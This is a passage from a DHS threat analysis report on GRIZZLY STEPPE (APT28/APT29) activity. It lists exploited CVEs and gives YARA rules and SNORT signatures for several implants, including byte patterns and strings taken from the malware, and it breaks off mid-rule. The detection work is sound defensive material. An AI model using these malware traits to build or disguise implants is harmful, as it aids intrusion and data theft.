CVE-2015-2424: Microsoft PowerPoint Memory Corruption Vulnerability
CVE-2014-1761: Microsoft Office Denial of Service (Memory Corruption)
CVE-2013-2729: Integer Overflow in Adobe Reader and Acrobat vulnerability
CVE-2012-0158: ActiveX Corruption Vulnerability for Microsoft Office
CVE-2010-3333: RTF Stack Buffer Overflow Vulnerability for Microsoft Office
CVE-2009-3129: Microsoft Office Compatibility Pack for Remote Attacks
Installation
GRIZZLY STEPPE actors have leveraged several different types of implants in the past.
Analysts can research these implants by reviewing open-source reporting on malware families
including Sofacy, and Onion Duke. Recently, DHS analyzed 17 PHP files, 3 executables, and 1
RTF file attributed to GRIZZLY STEPPE actors and the findings are located in MIFR10105049-Update2 (updated on 1/26/2017). The PHP files are web shells designed to provide a
user interface for various remote operations. The RTF file is a malicious document designed to
install and execute a malicious executable. DHS recommends that security analysts review their
systems for unauthorized web shells.
Command and Control
GRIZZLY STEPPE actors leverage their installed malware through Command and Control (C2)
infrastructure, which they traditionally develop via compromised sites and publicly available
infrastructure, such as TOR. C2 IOCs are traditionally the IP addresses or domains that are
leveraged to send and receive commands to and from malware implants.
Actions on the Objective
GRIZZLY STEPPE actors have leveraged their malware in multiple campaigns with various end
goals. GRIZZLY STEPPE actors are capable of utilizing their malware to conduct extensive data
exfiltration of sensitive files, emails, and user credentials. Security operation center (SOC)
analysts may be able to detect actions on the objective before data exfiltration occurs by looking
for signs of files and user credential movement within their network.
6 of 56
6 of 56
TLP:WHITE
TLP:WHITE
Detection and Response
The appendixes of this Analysis Report provide detailed host and network signatures to aid in
detecting and mitigating GRIZZLY STEPPE activity. This information is broken out by actor
and implant version whenever possible. MIFR-10105049 UPDATE2 provides additional YARA
rules and IOCs associated with APT28 and APT29 actors.
Contact Information
Recipients of this report are encouraged to contribute any additional information that they may
have related to this threat. For any questions related to this report, please contact NCCIC at:
Phone: +1-703-235-8832
Email: ncciccustomerservice@hq.dhs.gov
Feedback
DHS strives to make this report a valuable tool for our partners and welcome feedback on how
this publication could be improved. You can help by answering a few short questions about this
report at the following URL: https://www.us-cert.gov/forms/feedback
7 of 56
7 of 56
TLP:WHITE
TLP:WHITE
APPENDIX A: APT28
This section describes six implants associated with APT28 actors. Included are YARA rules as
well as SNORT signatures. Despite the use of sound production rules, there is still the chance for
false positives. In addition, these will complement additional analysis and should not be used as
the sole source of attribution.
The following YARA rules detect Downrage, referred to as IMPLANT 1 with rule naming
convention. These rules will also detect X-AGENT/CHOPSTICK, which shares characteristics
with DOWNRAGE.
Rule IMPLANT_1_v1
strings:
$STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 33 F6 8B CE
E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_1_v2
strings:
$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74
38 8B 4E 04 83 F9 FF 7E 21 57 }
$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81 80 78 19 01 75 0D
FF 70 10 FF [5] 85 C0 74 E3 }
condition:
(uint16(0) == 0x5A4D) and any of them
8 of 56
8 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_1_v3
strings:
$rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_1_v4
strings:
$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 32 04 0F 46
88 01 3B 75 0C 7C E0 }
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_1_v5
strings:
$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5]
6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71
33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and any of them
9 of 56
9 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_1_v6
strings:
$XORopcodes_eax = { 35 (22 07 15 0e|56 d7 a7 0a) }
$XORopcodes_others = { 81 (f1|f2|f3|f4|f5|f6|f7) (22 07 15 0e|56 d7 a7 0a) }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025) and any of them
Rule IMPLANT_1_v7
strings:
$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
condition:
(uint16(0) == 0x5A4D) and all of them
Network Indicators for Implant 1
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Downrage_HTTP_C2";
flow:established,to_server; content:"POST"; http_method; content:"="; content:"=|20|HTTP/1.1";
fast_pattern; distance:19; within:10; pcre:"/^\/(?:[a-zA-Z0-9]{2,6}\/){2,5}[a-zA-Z0-9]{1,7}\.[A-Za-z09\+\-\_\.]+\/\?[a-zA-Z0-9]{1,3}=[a-zA-Z0-9+\/]{19}=$/I";)
The following YARA rules detect CORESHELL/SOURFACE, referred to as IMPLANT 2 with rule
naming convention.
IMPLANT 2 Rules:
10 of 56
10 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_2_v1
strings:
$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v2
strings:
$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2]
4? [1-2] 01}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v3
strings:
$STR1 = {c1eb078d??01321c??33d2}
$STR2 = {2b??83??060f83??000000eb0233}
$STR3 = {89????89????8955??8945??3b??0f83??0000008d????8d????fe}
condition:
(uint16(0) == 0x5A4D) and any of them
11 of 56
11 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_2_v4
strings:
$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33
C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v5
strings:
$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15
[2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v6
strings:
$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ??
[1-2] 80 00 00 00 7F ?? 83 ?? 40 7F}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v7
12 of 56
12 of 56
TLP:WHITE
TLP:WHITE
strings:
$STR1 = {0a0fafd833d28d41fff775??
8b450cc1eb078d7901321c0233d28bc7895de4bb06000000f7f38b450c8d59fe025dff321c028bc133d2b90
6000000f7f18b450c8bcf221c028b45e48b55e008d41fe83f8068b45??72??8b4d??8b}
$STR2 = {8d9b000000000fb65c0afe8d34028b45??
03c20fafd88d7a018d42ff33d2f775??c1eb078bc7321c0a33d2b906000000f7f18a4d??
8b450c80e902024d??320c028b45??33d2f775??
8b450c220c028bd702d9301e8b4d0c8d42fe3b45e88b45??8955??72a05f5e5b8be55dc20800}
condition:
(uint16(0) == 0x5A4D) and any of them
Rule IMPLANT_2_v8
strings:
$STR1 = {8b??448944246041f7e08bf2b8abaaaaaac1ee0289742458448b??41f7??
8bcaba03000000c1e902890c248d044903c0442b??4489??24043bf10f83??0100008d1c764c896c24}
$STR2 = {c541f7e0????????????8d0c5203c92bc18bc8??8d04??460fb60c??
4002c7418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa46220c??
418d48fef7e1c1ea028d045203c02bc88bc1}
$STR3 = {41f7e0c1ea02418bc08d0c5203c92bc18bc8428d041b460fb60c??
4002c6418d48ff4432c8b8abaaaaaaf7e1c1ea028d045203c02bc8b8abaaaaaa}
$STR4 = {46220c??
418d48fef7e1c1ea028d04528b54245803c02bc88bc10fb64fff420fb604??410fafcbc1}
condition:
(uint16(0) == 0x5A4D) and any of them
13 of 56
13 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_2_v9
strings:
$STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89 45 E8 8B FF 0F
B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B
45 F4 C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7
F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4
8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8 0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10
03 C0 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02 C9
8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00
00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01 FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D
41 FF F7 F7 8B 45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33 D2 88 45 0B
8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D 0C }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_2_v10
strings:
$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2]
4? [1-2] 01}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v11
strings:
14 of 56
14 of 56
TLP:WHITE
TLP:WHITE
$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33
C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v12
strings:
$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15
[2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v13
strings:
$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2]
4? [1-2] 01}
condition:
(uint16(0) == 0x5A4D) and all of them
Rule IMPLANT_2_v14
strings:
15 of 56
15 of 56
TLP:WHITE
TLP:WHITE
$STR1 =
{8b??448944246041f7e08bf2b8abaaaaaac1ee0289742458448b??41f7??8bcaba03000000c1e902890c248
d044903c0442b??4489??24043bf10f83??0100008d1c764c896c24 }
$STR2 =
{c541f7e0????????????8d0c5203c92bc18bc8??8d04??460fb60c??4002c7418d48ff4432c8b8abaaaaaaf7e
1c1ea028d045203c02bc8b8abaaaaaa46220c??418d48fef7e1c1ea028d045203c02bc88bc1}
$STR3 =
{41f7e0c1ea02418bc08d0c5203c92bc18bc8428d041b460fb60c??4002c6418d48ff4432c8b8abaaaaaaf7e1
c1ea028d045203c02bc8b8abaaaaaa}
$STR4 =
{46220c??418d48fef7e1c1ea028d04528b54245803c02bc88bc10fb64fff420fb604??410fafcbc1}
condition:
(uint16(0) == 0x5A4D) and any of them
Rule IMPLANT_2_v15
strings:
$XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
$XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_2_v16
strings:
16 of 56
16 of 56
TLP:WHITE
TLP:WHITE
$OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7 75 F8 8B 45
0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02
5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02
C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and $OBF_FUNCT
Rule IMPLANT_2_v17
strings:
$STR1 = { 24108b44241c894424148b4424246836 }
$STR2 = { 518d4ddc516a018bd08b4de4e8360400 }
$STR3 = { e48178061591df75740433f6eb1a8b48 }
$STR4 = { 33d2f775f88b45d402d903c641321c3a }
$STR5 = { 006a0056ffd083f8ff74646a008d45f8 }
condition:
(uint16(0) == 0x5A4D) and 2 of them
Rule IMPLANT_2_v18
strings:
$STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF 8B 5D EC 83 C2
FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75
F4 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D
59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B
55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0
17 of 56
17 of 56
TLP:WHITE
TLP:WHITE
41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B
F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE 8D 14 08 8D 04 49 02 D2 03
C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00
00 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07
8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45
F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Rule IMPLANT_2_v19
strings:
$obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D
FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B 1E B8 09 3C AF 76 A1 38 56 76
BB A0 63 B6 9E 5D 86 E4 EC B0 DC 89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19
3E 1F B3 EE 9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11 BE 5E 27 94
5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4
E1 A9 A4 3B }
$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9
04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E 0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA
7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC
C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05 42 68 6A 3E 88 7F 38 97
49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14 81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B
E6 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and any of them
Rule IMPLANT_2_v20
strings:
18 of 56
18 of 56
TLP:WHITE
TLP:WHITE
$func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75
F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32
0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8
8B 45 D8 89 55 F8 72 A0 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
Network Indicators for Implant 2
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
(msg:"Coreshell_HTTP_CALLOUT"; flow:established,to_server; content:"POST"; http_method;
content:"User-Agent: MSIE "; fast_pattern:only; pcre:"/User-Agent: MSIE [89]\.0\x0d\x0a/D";
pcre:"/^\/(?:check|update|store|info)\/$/I";)
The following YARA rules detect X-Agent/CHOPSTICK, referred to as IMPLANT 3 with rule naming
convention.
IMPLANT 3 Rules:
Rule IMPLANT_3_v1
strings:
$STR1 = ">process isn't exist<" ascii wide
$STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii
wide
$STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0" ascii wide
$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
$STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14 02 8a 45 ?? 03 fa}
19 of 56
19 of 56
TLP:WHITE
TLP:WHITE
condition:
any of them
Rule IMPLANT_3_v2
strings:
$base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74 02 FF D0 C7 45 ??
83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8
C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ??
33 35}
$base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE 72 F1 5F 5E C3 8B
FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 }
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and any of them
Rule IMPLANT_3_v3
strings:
$STR1 = ".?AVAgentKernel@@"
$STR2 = ".?AVIAgentModule@@"
$STR3 = "AgentKernel"
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and any of them
20 of 56
20 of 56
TLP:WHITE
TLP:WHITE
The following YARA rules detect BlackEnergy / Voodoo Bear, referred to as IMPLANT 4 with rule
naming convention.
IMPLANT 4 Rules:
Rule IMPLANT_4_v1
strings:
$STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45
DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2EE9 ?? ?? ?? ??} $STR2 = {C7
45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00}
condition:
(uint16(0)== 0x5A4D or uint16(0) == 0xCFD0 or uint16(0)== 0xC3D4 or uint32(0) == 0x46445025 or
uint3
2(1) == 0x6674725C) and 1 of them
Rule IMPLANT_4_v2
strings:
$BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64}
$BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32}
$CONSTANT = {26 80 AC C8}
condition:
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) ==
0x46445025 or uint32(1) == 0x6674725C) and all of them
21 of 56
21 of 56
TLP:WHITE
TLP:WHITE
Rule IMPLANT_4_v3
strings:
$a1 = "Adobe Flash Player Installer" wide nocase
$a3 = "regedt32.exe" wide nocase
$a4 = "WindowsSysUtility" wide nocase
$a6 = "USB MDM Driver" wide nocase
$b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15
28 0A 3F 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00
00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00
1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F
00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00
73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00
00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F
00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00 69 00 76 00 65 00
72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E
00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00
4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30
00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00
69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79
00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00
65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64
00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73
00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00
65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35
00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00
4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D
00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74
00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00
69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44
00 72 00 69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00
72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35
00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00
72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00
43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00 67 00 69
00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00
64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63
22 of 56
22 of 56
TLP:WHITE
TLP:WHITE
00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00
20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E
00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00
64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32
00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48 00 00 00 01 00 56 00 61 00 72 00 46 00 69
00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54 00 72 00 61 00 6E 00 73 00
6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04}
$b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00
02 00 3F 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00
00 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70
02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 53 00 6F 00 6C 00 69 00 64 00 20
